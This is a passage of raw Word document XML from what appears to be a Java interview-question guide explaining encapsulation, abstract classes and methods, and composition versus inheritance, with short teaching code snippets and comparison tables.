          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc197867327"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do we achieve encapsulation in Java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="5DEAE78A" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F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CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">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Key Ways to Achieve Encapsulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D144A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1. Using Private Access Modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5544D007"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Make class fields private to prevent direct access from outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED907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CBB24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private field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882CBC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CD0222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57BB06FC" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D07E310"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Providing Public Getter and Setter Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EBDC4"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Create public methods to access and modify private fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE30A0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058CA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AF2E7F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3BAF3F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62ED5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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1B49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0A20C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C9872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67842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14541A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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5799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Nam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4582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1BC6A0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3B932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C88795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age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3A6F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A34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0CAA88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9B0C00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CC2A23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age with validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6904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Age</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F6A659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validation logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC80B4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5864755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F62AF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DB7E4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588523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3. Implementing Constructors with Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7F64E"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Initialize fields through constructors with validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740E9C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54354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598DC0E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E2E80B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90DA12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AED6FB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71E307E2" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB24B7C"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Benefits of Encapsulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C069A8E"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Data Hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Internal representation is hidden from outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14641081"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Increased Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can change internal implementation without affecting other code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9F350"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Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Encapsulated code is easier to reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5824B9"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Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can add validation logic in setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09858CD3"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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Easier to maintain and modify code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378364B"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15C7CB9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CD937D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4110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pers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6F1CF1D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77625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through getters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33052A6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lice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6837A59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30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8E10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03DD2D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dify through setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD466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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413039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Nam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 Smith"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E4D0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5D680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nvalid age won't be set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C72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5</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ge remains 31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F1EB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FAE94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6D49160" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc197867328"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is abstract in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="03D9F362" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">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Abstract</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> is a non-access modifier that can be applied to classes and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AB278" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417D8474" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Abstract Class: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstract is a non-access modifier that can be applied to classes and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F2E5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not be instantiated (cannot create objects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B144B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contain both abstract and concrete methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A56E5B"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as a base class for inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F875F0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nim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755F57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 (no implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7F46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keSound</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1729245D"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64B5B1"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crete method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529AF9B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6B37C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nimal is eating"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124793A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EF836A6"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35554FE" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAA9A8C" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">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Abstract Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7B38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Has no body (no implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAEB3CF"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Must be overridden by the first concrete subclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1834D269"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exist in abstract classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78C130"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982D5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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calculateAre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551174AB"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9B5B830" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pP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6B67CAC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f a class has even one abstract method, the class must be declared abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DAF6C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Abstract classes can have constructors (called when subclass is instantiated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7639287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to define common interface for subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8058BD" w14:textId="75B09603" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00195703">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3B48DF70">
          <v:rect id="_x0000_i1315" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBEAC46" w14:textId="77777777" w:rsidR="00341D0C" w:rsidRPr="00CE4B95" w:rsidRDefault="00341D0C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc197867329"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Composition in Oops?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="0D232432" w14:textId="02CDFFBA" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C4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ion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design principle in Object-Oriented Programming where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one class contains a reference to another class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a part of its fields, meaning "has-a" relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183040D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de reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by building complex types from simpler components, and is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stronger than inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in many cases because it promotes better flexibility and encapsulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E347E88"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54DE85">
          <v:rect id="_x0000_i1316" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6D5A4"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 Car has an Engine"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489EAA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ngine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C4DF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151823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5A230B60"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7844C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37D81" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D22975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631446B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 = new Engine(); // Composition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE97BD3" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674020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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DC9B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gine.start(); // Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F985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moving");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F332F6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F0D7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A44FCB"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 has an Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Composition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995F62F"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uses Engine to perform its functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912684E"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ngine changes internally, Car is unaffected — this promotes loose coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22383C4C"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942B2">
          <v:rect id="_x0000_i1317" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DFFC8" w14:textId="78507A56"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49"/>
      </w:tblGrid>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="3E09D8B1" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30FA8322"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15858346"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02C47" w:rsidRPr="00CE4B95" w14:paraId="3789908D" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACAC3F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Reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FCD718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e functionality by containing objects of other classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="1AE43081" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="337B4DC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62F1D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than inheritance (change behavior at runtime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="54E19B73" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F257A3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BCE500C"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s internal implementation hidden and safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="4B8ACA35" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E15625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Inheritance Pitfalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="456B96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tight coupling and fragile base class problems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="267C3C9B"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B09135">
          <v:rect id="_x0000_i1318" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="072DC8A0"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737"/>
        <w:gridCol w:w="2076"/>
      </w:tblGrid>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="786F84DB" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02764C17"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F51B70B"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CE7ECA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heritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="2D719FFA" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6948C7D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282817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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252C3EC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r>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="3F3E1D46" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B13166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2650674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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75970F97"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r>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="6354D2BC" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CF5E55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06CFF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can change component)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A3B49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r>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="29FACCD7" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48255F1F"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ability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CBF068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delegation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="276A097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method overriding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="1979A5FA" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1591121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796F1EB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has an Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F96A8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is an Animal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AE119DF"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A9B3">
          <v:rect id="_x0000_i1319" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA66B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1C343BB3" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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r</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
